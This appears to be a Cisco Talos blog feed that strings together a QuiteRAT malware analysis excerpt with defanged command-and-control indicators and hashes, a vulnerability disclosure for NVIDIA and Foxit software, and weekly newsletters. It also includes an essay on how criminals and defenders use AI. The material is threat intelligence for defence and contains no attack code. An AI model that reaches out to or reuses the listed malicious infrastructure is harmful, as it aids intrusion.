QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size. This substantial difference in size is due to Lazarus Group incorporating only a handful of required Qt libraries into QuiteRAT, as opposed to MagicRAT, in which they embedded the entire Qt framework. Furthermore, while MagicRAT consists of persistence mechanisms implemented in it via the ability to set up scheduled tasks, QuiteRAT does not have a persistence capability and needs to be issued one by the C2 server to achieve continued operation on the infected endpoint. This is another contributing factor to the smaller size of QuiteRAT.

There are similarities between the implants that indicate that QuiteRAT is a derivative of MagicRAT. Apart from being built on the Qt framework, both implants consist of the same abilities, including running arbitrary commands on the infected system. Both implants also use base64 encoding to obfuscate their strings with an additional measure, such as XOR or prepending hardcoded data, to make it difficult to decode the strings automatically. Additionally, both implants use similar functionality to allow them to remain dormant on the endpoint by specifying a sleep period for them by the C2 server.

**Coverage**

Ways our customers can detect and block this threat are listed below.

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

**IOCs**

IOCs for this research can also be found at our Github repository here.  

**Hashes  
****QuiteRAT**

ed8ec7a8dd089019cfd29143f008fa0951c56a35d73b2e1b274315152d0c0ee6  

**Networks IOCs  
**

146\[.\]4\[.\]21\[.\]94

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/comp\[.\]dat

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/log\[.\]php

hxxp\[://\]146\[.\]4\[.\]21\[.\]94/tmp/tmp/logs\[.\]php

hxxp\[://\]ec2-15-207-207-64\[.\]ap-south-1\[.\]compute\[.\]amazonaws\[.\]com/resource/main/rawmail\[.\]php

Lazarus Group exploits ManageEngine vulnerability to deploy QuiteRAT

The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packer, which can lead to a memory corruption problem in the driver.

Wednesday, August 23, 2023 12:08

_Piotr Bania of Cisco Talos discovered the vulnerabilities mentioned in this post._

Cisco Talos recently disclosed three vulnerabilities in the shader functionality of the NVIDIA D3D10 driver that works with NVIDIA’s graphics cards.

The driver is vulnerable to memory corruption if an adversary sends a specially crafted shader packer, which can lead to a memory corruption problem in the driver.

All three issues, identified as TALOS-2023-1719 (CVE-2022-34671), TALOS-2023-1720 (CVE-2022-34671) and TALOS-2023-1721 (CVE-2022-34671), have a CVSS severity rating of 8.5 out of 10.

An attacker could exploit these vulnerabilities from guest machines running virtualization environments (such as VMware, QEMU and VirtualBox) to perform a guest-to-host escape, as we’ve illustrated with previous vulnerabilities in NVIDIA graphics drivers.

Talos' research also indicates that these vulnerabilities could be triggered from a web browser using WebGL and WebAssembly. Our researchers triggered these issues from a HYPER-V guest using the RemoteFX feature, leading to the execution of vulnerable code on the HYPER-V host (inside the rdvgm.exe process). Microsoft recently deprecated RemoteFX, but older machines may still use this software.

Talos worked with NVIDIA to ensure these vulnerabilities are resolved and an update is available for affected customers, all in adherence to Cisco’s vulnerability disclosure policy.

For Snort coverage (SIDs 61386, 61387, 61398, 61399, 61410 and 61411) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

Three vulnerabilities in NVIDIA graphics driver could cause memory corruption

Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.
It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author&

Tuesday, August 22, 2023 05:08

Adversaries are increasingly writing malware in programming languages such as Go, Rust, or Nim, because they present challenges to investigators using reverse-engineering tools designed to work best against the C family of languages.

It’s often difficult for reverse engineers examining non-C languages to differentiate between the malware author’s code and the language’s standard library code. In the vast majority of cases, Hex-Ray’s Interactive Disassembler (IDA) has the out-of-the-box capability to identify library functions or generate custom Fast Library Identification and Recognition Technology (FLIRT) signatures and solve the issue.

But for Nim, generating signatures is distinctly more difficult. Cisco Talos is excited to announce a new project to find an automated way to generate custom FLIRT signatures for IDA, which led to a talk at Recon.cx 2023 and a guest blog on Hex-Rays. This blog describes the technical details of our research.

Generating FLIRT signatures for Nim and other non-C programming languages

Unsurprisingly, it seems like AI was the talk of the town.

Thursday, August 17, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

I had a significant amount of FOMO last week seeing everyone out in Vegas. (I was happy to not get conference crud sickness, but it seems like I missed a great time otherwise.)

But, as anyone who works with me could guess, I was following closely online through social media and news reporting. If you’re in the same boat as me and couldn’t attend BlackHat or DEF CON in person, I wanted to use this space to recap what I felt were the top stories and headlines coming out of the various new research that was published, talks, interviews and more.

Unsurprisingly, it seems like AI was the talk of the town. One panel, which featured the former Cyber Czar in the Obama administration, promised coming action from the Biden administration around AI and its intersection with cybersecurity, including an executive order that apparently will be as broad as earlier orders around the U.S.’ broader approach to security.

There were many other panels and talks around AI, along with questions about whether the technology has plateaued after so many companies developed their own ChatGPT-like.

I was also fascinated by several interviews and talks from an FBI official about distributed denial-of-service attacks. I’ve written before about how there’s a renewed interest in DDoS attacks recently, especially those targeting high-profile companies and games.

Two high-ranking government officials gave a joint talk at Black Hat where they said the majority of DDoS attacks are the result of a dispute over business transactions or good ‘ol fashioned video game beef.

The same presenters gave additional details on how the FBI prioritizes stopping DDoS attacks. Chances are, if you’re a bad actor who makes the news for DDoS attacks, the federal government is not far behind.

I also always love the crazy vulnerabilities or hacking methods that come out of both these conferences. A highlight for me was a group of researchers who found a way to hijack one of the most popular automatic card shufflers (fitting for Vegas) to the point that someone could know the order of cards ahead of time in a gambling game.

I’m not quite sure what the actual attack surface is here because the potential hacker would need to install a tiny physical USB device into the shuffler, and I don’t think any casino worker would be thrilled to see you crawling around on the floor, but I do always love to see the downside of putting a USB port on everything.

And there was the brief, but confusing, saga at DEFCON about the pop-up notifications iPhone users were getting asking people to pair with a rogue Apple TV. Turns out it was a harmless prank from one of the attendees, who just wanted to drive home the point that it’s important to really turn off Bluetooth all the way, and not just click the little button in the Control Center.

Lastly, we wanted to thank Viktor Zhora, the deputy chairman and chief digital transformation officer at the State Service of Special Communication and Information Protection for Ukraine, for taking the time to say “Hi” to us on the show floor. He specifically took time out of his day to make sure he could meet Matt Olney, who’s been one of our leaders in helping support Ukraine. Viktor was a speaker at BlackHat and had a very busy schedule of media appearances, so we were flattered that he made sure to see Matt.

**The one big thing**

Since AI was already the talk of the town at Black Hat and DEF CON, we wanted to continue the conversation around tehse tools and the implications on cybersecurity. As one of our incident responders wrote in the latest in our “On the Radar” series, AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders. The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.

**Why do I care?**

AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. For defenders, though, AI also opens the door to new defensive tactics and tools, so it’s important to see the positives and negatives of AI in security.

**So now what?**

There is no real action for the average user to take at this point, but I feel this piece is a good opportunity for everyone to take a step back about what we currently know, and don’t know, about AI and its intersection with security.

**Top security headlines of the week**

**Two police precincts in the U.K. had mistakenly been leaking the personal information of individuals connected to crimes for years.** The UK's Norfolk and Suffolk police constabularies disclosed that, between April 2021 and March 2022, the information was accidentally attached to crime statistics distributed as part of Freedom of Information Act (FOIA) requests. The data includes personally identifiable information related to witnesses, suspects and victims of a variety of crimes, including domestic violence, assaults, thefts and hate crimes. The forces say they are now contacting more than 1,200 people who may have been affected. Representatives from the two departments said in a statement that, “Strenuous efforts have been made to determine if the data released has been accessed by anyone outside of policing. At this stage we have found nothing to suggest that this is the case.” (CSO Online, Politico)

Viktor Zhora, one of Ukraine’s top cybersecurity officials, said at Black Hat that **his country is taking several steps to document what may constitute war crimes committed by Russian state-sponsored actors.** Zhora said that attacks affecting critical infrastructure and communications for civilians could fall under such umbrellas and his team is actively collecting evidence as the kinetic military conflict continues. Speaking alongside Zhora, Jen Easterly, the U.S.’ top cybersecurity official, said the U.S. has learned several lessons from Russia’s invasion of Ukraine, including the importance of assistance from private cybersecurity companies. (CyberScoop, The Record)

**Several years’ worth of Intel chips contains a newly discovered flaw known as “Downfall,”** which is like the Meltdown and Spectre bugs from several years ago. Identified as CVE-2022-40982, the issue could allow the CPU to “unintentionally reveal internal hardware registers to software,” according to a write-up from Google’s security research team. Proof of concept code shows that an attacker could use Downfall to steal encryption keys from other users on a given server and other sensitive data. Downfall affects most CPUs in Intel's 6th through 11th-generation Core lineups for consumer PCs. Most of the affected devices were sold starting in 2015 and may still be available in systems today. Intel’s patch for the issue negatively affects the performance of the CPUs, with some studies finding that performance could dip to 40 percent. (Ars Technica, PC World)

**Can’t get enough Talos?**

*   Cisco XDR: from detection and response to continuity after a cyberattack
*   As Ransomware Gangs Shift To Data Extortion, Some Adopt A New Tactic: ‘Customer Service’
*   Talos Takes Ep. #150: What's the difference between data theft extortion and ransomware?

**Upcoming events where you can find Talos**

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0** **(Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!Mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

Recapping the top stories from Black Hat and DEF CON

A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations.

Monday, August 14, 2023 08:08

*   AI’s influence is growing across the security space, bringing with it major implications for cybercriminals and defenders.
*   The recent adoption of AI has raised significant concerns for cybersecurity due to the many ways that criminals can use AI for disruption and profit.
*   Defenders and law enforcement can use AI to strengthen cybersecurity and counteract illicit activities.

The past decade has seen a massive adoption in machine learning and artificial intelligence. An increasing number of organizations have been leveraging such technologies to automate their operations and make their products and services better.

Despite the extensive use of machine learning (ML) and artificial intelligence (AI) by organizations for some time now, many users have first interacted with such technologies over the past few months in the form of generative AI helping users to generate text, code, images and other digital assets with the provision of limited input. The likes of ChatGPT have brought AI to the top of the public’s mind, fueling an intensive race for AI development.

As with any innovation, the use of AI is expected to have positive and negative effects on global culture as we know it, but I suspect that cybercrime will be one of the areas most affected. On the negative side, AI can help streamline criminals' operations, making them more efficient, sophisticated, and scalable while allowing them to evade detection and attribution. Concerning the positive impact of AI on cybersecurity, defenders, and law enforcement, can use AI to counteract advancements in illicit activity by developing new tools, tactics and strategies to automate data analysis, perform predictive detection of illicit activity and perform more effective attribution of criminal activity.

It is important to acknowledge that the AI use cases discussed in this blog encompass a range of varying complexities to achieve for both criminals and defenders. Certain use cases can be accomplished using readily available AI-enabled tools, while others demand advanced technical skills, costly infrastructure, and considerable time investments.

**Empowering cybercrime**

Cybercriminals are expected to benefit in many ways from advancements in machine learning and artificial intelligence.

A major area of impact of AI tools in cybercrime is the reduced need for human involvement in certain aspects of cybercriminal organizations, such as software development, scamming, extortions, etc., which in turn will decrease the need to recruit new members and lower operational costs due to the reduced need for headcount. While crime-related "job" postings typically find their way onto dark web forums and other anonymous channels, striving to ensure author anonymity, this practice carries significant risks as it could potentially unveil the identities and operations of criminals to whistleblowers and undercover law enforcement agents.

AI presents another avenue for cybercriminals to exploit by utilizing it to analyze enormous amounts of information, including leaked data. This analysis empowers them to identify vulnerabilities or high-value targets, enabling more precise and effective attacks that could potentially yield greater financial gains. Big data analytics is a complex undertaking necessitating significant processing power and thereby limiting its application to potentially large criminal organizations and state-sponsored actors capable of harvesting such power.

Another area of criminal activity that can thrive with AI is the development of more sophisticated phishing and social engineering attacks. This includes the creation of remarkably realistic deepfakes, deceitful websites, disinformation campaigns, fraudulent social media profiles and AI-powered scam bots. To illustrate the impact, consider an incident from 2020 wherein an AI-powered voice cloning attack successfully impersonated a CEO, resulting in the theft of more than $240,000 from a UK-based energy company. Similarly, in India criminals employed a machine learning model to analyze and mimic the writing style of a victim's email contacts to create highly personalized and persuasive phishing emails.

The utilization of AI is anticipated to also be prevalent among state-sponsored actors and prominent criminal organizations, to propagate disinformation and manipulate the public. Such tactics involve the creation and dissemination of deceptive content, including deep fakes, voice cloning, and the deployment of bots. Evidence of such practices already exists by a cybercriminal group employing AI for social media manipulation and spreading disinformation about the COVID-19 pandemic. This campaign relied on machine learning to identify emerging trends and generate highly convincing fake news articles.

The advancement of malware can also be impacted by allowing authors to streamline the process with the help of AI, enabling the creation of sophisticated and more adaptable malware. Allowing AI-powered malware to employ advanced techniques to evade detection by security solutions, utilizing "self-metamorphic" mechanisms rendering them capable of changing their operations based on the environment they operate in. Furthermore, criminals can potentially harness AI technology in the development of AI-powered malware development kits. These kits employ AI agents that learn from the latest tools, tactics, and procedures (TTPs) employed by malware authors, as well as stay updated with the latest advancements in security. An example of AI-powered malware is demonstrated by the researchers behind DeepLocker. Showcased how AI can be used to enhance targeted attacks, ensuring exploitation only when the intended target is present and to evade detection by concealing itself within benign applications.

**Counteracting cybercrime**

On the other side, cybersecurity professionals, defenders, and law enforcement agencies can harness the power of AI to counteract the advancements made in cybercrime. They can utilize AI to develop innovative tools, tactics, and strategies in their fight against malicious activities.

Areas such as threat detection and prevention will be at the forefront of AI security research. Many existing security tools, heavily rely solely on malicious signatures and user input, which render them ineffective for detecting advanced attacks. Consequently, an increasing number of vendors are turning to machine learning (ML) and AI technologies to achieve more precise and effective threat detection. Prominent examples include Cisco Secure Endpoint and Cisco Umbrella utilizing advanced machine learning to detect and mitigate suspicious behavior in an automated manner on end hosts and networks respectively. The inclusion of these technologies is likely to counter the malware being generated by AI discussed above.

Analysis of large amounts of data for the identification of indicators of compromise can be a tedious undertaking, consuming considerable time and money. As such, one area that can benefit from AI is Incident response and forensics for the automated analysis of large volumes of logs, system images, network traffic and user behavior for the identification of indicators of compromise (IOCs) and adversarial activity. AI can help speed up the investigation process, identify patterns that may be difficult to detect manually, and provide insights into the techniques and tools used by adversaries. Allowing more companies globally to have incident response and forensic capabilities.

Another potential use for AI by defenders and law enforcement alike is to enhance the attribution of criminal activity to adversaries through the analysis of multiple data points, including attack signatures, malware characteristics, and historical attack patterns, tools, tactics, and procedures. By examining these data sets, AI can identify patterns and trends that aid cybersecurity experts in narrowing down the potential origin of an attack. This attribution is valuable as it provides insights into the motives and capabilities of the attackers, allowing for a better understanding of their tactics and potential future threats. In addition, it allows defenders to more accurately identify adversaries that are leveraging tactics to evade identification by misleading attribution (e.g., use techniques, methodologies and tools another hacking group is using), which is an existing occurrence that defenders must consider when performing attribution. Such capabilities are primarily expected to be witnessed in the arsenal of state-affiliated cyber agencies as well as on a corporate level from threat intelligence providers.

ML algorithms and AI are set to expand their utilization for automated analysis and the identification of threats. Through the automated analysis of security-related data from multiple sources like threat intelligence feeds, dark web monitoring, and open-source intelligence, emerging threats can be identified and mitigated effectively. Cisco Talos has been leveraging AI for several years to automate threat intelligence operations such as the classification of similarly rendered web pages, identify spoofing attempts through logo analysis, phishing email classification based on text analytics and binary similarities analysis. Although existing work around emerging threats has proven to be highly effective, AI will further the area by allowing for more automate data collection, analysis, and correlation on a larger scale, facilitating the identification of patterns and trends that may signify new attack techniques or threat actors. This empowers cybersecurity professionals to proactively respond to emerging cyber threats by leveraging AI's ability to process and interpret vast amounts of data swiftly and accurately.

AI can also serve as a valuable tool for predictive analytics, enabling the anticipation of potential cyber threats and vulnerabilities based on historical data and patterns. By analyzing data from past attacks and adversaries, AI systems can identify common trends, patterns, or groups that may indicate or trigger future attacks. This capability empowers cybersecurity experts to take a more proactive stance to security, such as promptly patching vulnerabilities or implementing supplementary security controls, to mitigate potential risks before they are exploited by adversaries. Additionally, AI-driven predictive analytics allows for closer monitoring of adversaries' activities, enabling experts to anticipate and prepare for new attacks. By leveraging AI in this manner, cybersecurity professionals can enhance their defenses and stay one step ahead of evolving threats. A sizable number of cybercrime predictive research exists, highlighting how to practically use AI to support cybercrime research, as well as how to perform predictive analysis based on social and economic factors using the Bayesian and Markov Theories.

The rise of AI presents new challenges and great opportunities as its user base and applications continue to expand. The effective and targeted utilization of AI-related technologies will play a pivotal role for cybersecurity experts and law enforcement agencies in detecting, defending against, and attributing digital criminal behavior. By harnessing the power of AI, these entities can enhance their capabilities in combating evolving threats and ensuring the security of digital ecosystems. As the landscape of cybercrime evolves, embracing AI will be instrumental in staying ahead of adversaries.

The rise of AI-powered criminals: Identifying threats and opportunities

With BlackHat and “Hacker Summer Camp” going on over the next few weeks, this seems like the right time to step back and reflect on what’s happened so far this year.

Thursday, August 10, 2023 14:08

Welcome to this week’s edition of the Threat Source newsletter.

Between the Talos Takes episode last week and helping my colleague Hazel with the Half-Year in Review, I realized how much I had already forgotten about 2023 already.

It’s been a whirlwind, personally and professionally, and I think it’s important for the security community to take a step back occasionally, to look back on what’s already happened in a year and what that tells us about the coming months.

For me, in reading the Year in Review so far and reflecting on it on the podcast, I had completely forgotten about supply chain attacks. I personally think the MOVEit file transfer breach, and follow-on breaches and compromises, has been placed on the back burner because it’s almost too big for us to even conceive of. At this point, nearly every Fortune 500 company has been affected by this in some way.

The dangers of the MOVEit breach continue to grow, with Clop now using torrents to leak targets’ information, potentially making the leaks more dangerous and faster for bad actors to download.

The list of affected organizations grows every day, with the Clop ransomware group adding more names to its leak site, and public companies having to make disclosures about potential data leaks or theft. Yet the news around this seems to have been relegated to regular news posts about, “Company X just got added to the Clop leak site” rather than reflecting on the dangers of supply chain attacks.

I’ve written before about how we aren’t talking about supply chain attacks enough already, and this year alone we’ve seen MOVEit (which, in my opinion, kind of straddles the line as a “traditional” supply chain attack because it’s more of a data breach with more follow-on data breaches), 3CX, and another attack against CircleCI, a continuous integration platform vendor.

3CX was a big deal in the moment, but looking at the Half-Year in Review, I feel like we moved past it so quickly. Instead, headlines are still dominated by ransomware attacks and big-game hunting, which are certainly no less important on the security landscape — but it is so easy to get swept up in the day’s goings-on by looking for the latest, fastest updates on security social media.

With BlackHat and “Hacker Summer Camp” going on over the next few weeks, this seems like the right time to step back and reflect on what’s happened so far this year. This could include just taking time to look back on personal successes, team wins, or just one or two things that happened in February that you may have already forgotten about.

**The one big thing**

Our researchers recently discovered an unknown threat actor, seemingly of Vietnamese origin, conducting a ransomware operation that’s been going on since at least June 4. This ongoing attack uses a variant of the Yashma ransomware likely to target multiple geographic areas by mimicking WannaCry characteristics. The threat actor uses an uncommon technique to deliver the ransom note. Instead of embedding the ransom note strings in the binary, they download the ransom note from the actor-controlled GitHub repository by executing an embedded batch file.

**Why do I care?**

This new actor appears to target users and companies all over the world, including a variety of English-speaking nations, Bulgaria, China and Vietnam. Victims hit with this malware are asked to pay a requested ransom in the form of Bitcoin, an amount that doubles if it’s not made within three days post-infection. This Yashma variant also appears to be harder to recover from than the average ransomware — after encrypting files, the ransomware wipes the contents of the original, unencrypted file and then replaces the file name with a “?”.

**So now what?**

Cisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are infected with this specific threat. For specific OSqueries on this threat, click here. There are also numerous protections in place to detect and defend against this malware, as outlined in our blog post.

**Top security headlines of the week**

**Dozens of hospitals and healthcare facilities across the U.S. are still recovering after a large healthcare system was forced to take its computer systems offline** as the result of a ransomware attack. Prospect Medical Holdings, a chain that operates hospitals and outpatient facilities, in California, Connecticut, Pennsylvania and Rhode Island, first disclosed the incident last week, announcing it was having to shut down some emergency rooms and reroute ambulances to other facilities. The FBI announced it was launching an investigation into the cause, and actors behind, the attack. Some outpatient facilities, like radiology and heart health clinics, had to close altogether temporarily because they could not function without the use of the company’s computer systems. (CBS News, NBC News)

**Cult of the Dead Cow, an infamous hacking group once known for shaming companies into improving their security, is planning to launch a new app framework that puts privacy first.** The system will allow individuals and companies to create social media and messaging apps that do not hold onto users’ personal data. Traditional social media companies make a large chunk of their profits off selling that information to advertisers and other companies looking to reach certain demographics. Representatives from the hacking collective are expected to discuss the framework more at the upcoming DEF CON conference. Creators say the framework uses the in-house “Veilid” protocol for end-to-end encryption that could make it difficult for even governments to view information on the apps without proper authorization. However, they still face the challenge of convincing developers and companies to design apps that are compatible with Veilid. (Washington Post, DarkReading)

**The U.K.’s Electoral Commission revealed this week it was the target of a “complex cyber attack”** that potentially exposed the personal details of millions of British voters. The Commission said adversaries stole copies of the electoral registers from August 2021, but the breach was not discovered until October 2022. However, they’ve yet to “conclusively” determine what files, exactly, were accessed. An early report on the attack from the Electoral Commission found that the personal data found on the registers did not present a “high risk” to the individuals listed on it. However, that information could be paired with other public information or stolen data from other attacks to “identify and profile individuals.” The adversaries were removed from the network as soon as the breach was discovered in October. (Infosecurity Magazine, BBC)

**Can’t get enough Talos?**

*   What Cisco Talos knows about the Rhysida ransomware
*   Code leaks are causing an influx of new ransomware actors
*   The Need to Know: What is commercial spyware?
*   Six critical vulnerabilities included in August’s Microsoft security update
*   Cisco Talos Discusses Flaws in SOHO Routers Post-VPNFilter
*   Suspected Vietnamese hacker targets Chinese, Bulgarian organizations with new ransomware
*   Sloppy security from cybercriminals is creating a new generation of ransomware gangs

**Upcoming events where you can find Talos****Upcoming events where you can find Talos**

**BlackHat (Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration** **(Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**ATT&CKcon 4.0 (Oct. 24 - 25)**

McLean, Virginia

> Nicole Hoffman and James Nutland discuss the MIRE ATT&CK framework in “One Leg to Stand on: Adventures in Adversary Tracking with ATT&CK.” Even though ATT&CK has become an industry standard for cyber threat intelligence reporting, all too often, techniques are thrown at the bottoms of reports and blogs without any context never to be seen again after dissemination. This is not useful for intelligence producers or consumers. In this presentation, Nicole and James will show analysts how to use ATT&CK as a guideline for creating a contextual knowledge base for adversary tracking.

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f  
**Typical Filename:** VID001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** 1c25a55f121d4fe4344914e4d5c89747b838506090717f3fb749852b2d8109b6  
**MD5:** 4c9a8e82a41a41323d941391767f63f7  
**Typical Filename:** !!Mreader.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Generic::sheath

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** 7bf7550ae929d6fea87140ab70e6444250581c87a990e74c1cd7f0df5661575b  
**MD5:** f5e908f1fac5f98ec63e3ec355ef6279  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::tpd

Reflecting on supply chain attacks halfway through 2023

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

Wednesday, August 9, 2023 12:08

Cisco Talos recently worked with two vendors to patch multiple vulnerabilities in a favored software library used in chemistry laboratories and the Foxit PDF Reader, one of the most popular PDF reader alternatives to Adobe Acrobat.

Attackers could exploit these vulnerabilities to carry out a variety of attacks, in some cases gaining the ability to execute remote code on the targeted machine.

Seven of the vulnerabilities included in today’s Vulnerability Roundup have a CVSS severity score of 9.8 out of a possible 10.

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.

**Multiple vulnerabilities in Open Babel software**

Talos researchers recently discovered multiple vulnerabilities in Open Babel, an open-source software library used in a variety of chemistry and research settings.

Open Babel allows users to “search, convert, analyze, or store data from molecular modeling, chemistry, solid-state materials, biochemistry, or related areas,” according to its website, and is used in other popular pieces of software in the science field. Therefore, there are cases where these vulnerabilities are accessible via the internet.

The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted, malformed file. Depending on the platform and on how the code is compiled, these vulnerabilities could lead to arbitrary code execution:

*   TALOS-2022-1664 (CVE-2022-43607)
*   TALOS-2022-1665 (CVE-2022-46289, CVE-2022-46290)
*   TALOS-2022-1666 (CVE-2022-46292, CVE-2022-46295, CVE-2022-46294, CVE-2022-46293, CVE-2022-46291)
*   TALOS-2022-1667 (CVE-2022-41793)
*   TALOS-2022-1668 (CVE-2022-42885)
*   TALOS-2022-1669 (CVE-2022-44451)
*   TALOS-2022-1670 (CVE-2022-46280)
*   TALOS-2022-1671 (CVE-2022-43467)
*   TALOS-2022-1672 (CVE-2022-37331)

Talos is disclosing these vulnerabilities despite no official fix from Open Babel. The vendor declined to release an update within the 90-day period as outlined in Cisco’s vulnerability disclosure policy.

**Several issues in Foxit PDF reader could lead to arbitrary code execution**

Foxit PDF Reader is one of the most popular PDF readers on the market, offering many similar features to Adobe Acrobat. The software also includes a browser extension that allows users to read PDFs right in their web browsers.

Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine. An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or, if the user has the browser extension enabled, by visiting a malicious web page:

*   TALOS-2023-1739 (CVE-2023-28744)
*   TALOS-2023-1756 (CVE-2023-27379)
*   TALOS-2023-1757 (CVE-2023-33866)
*   TALOS-2023-1795 (CVE-2023-32664)
*   TALOS-2023-1796 (CVE-2023-33876)